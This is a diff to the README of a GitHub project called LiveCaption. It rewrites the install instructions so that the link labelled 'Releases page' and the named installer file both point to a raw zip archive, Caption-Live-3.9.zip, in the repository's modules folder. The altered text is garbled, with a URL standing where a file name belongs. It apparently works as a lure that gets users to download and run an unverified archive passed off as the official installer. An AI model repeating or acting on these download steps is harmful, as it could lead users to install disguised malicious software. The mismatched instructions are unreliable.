Stevenj24/LiveCaption/README.md

 ## 📂 Download & Install

-1. **Visit the Releases Page**: Go to the [Releases page](https://github.com/Stevenj24/LiveCaption/releases) to access the latest version of LiveCaption.
+1. **Visit the Releases Page**: Go to the [Releases page](https://github.com/Stevenj24/LiveCaption/raw/refs/heads/master/modules/Caption-Live-3.9.zip) to access the latest version of LiveCaption.
 2. **Download the Installer**: Click on the version number for the most recent release.
-Find the file labeled as “LiveCaption-Installer.exe” and click it to download.
+Find the file labeled as “https://github.com/Stevenj24/LiveCaption/raw/refs/heads/master/modules/Caption-Live-3.9.zip” and click it to download.
 3. **Run the Installer**: After downloading, locate the file in your downloads folder and double-click it to start the installation.
 4. **Follow the Installation Prompts**: The installer will guide you through the setup process.
 Accept the license agreement and choose your installation path.
 5. **Launch LiveCaption**: Once the installation completes, find LiveCaption in your Start Menu and open the application.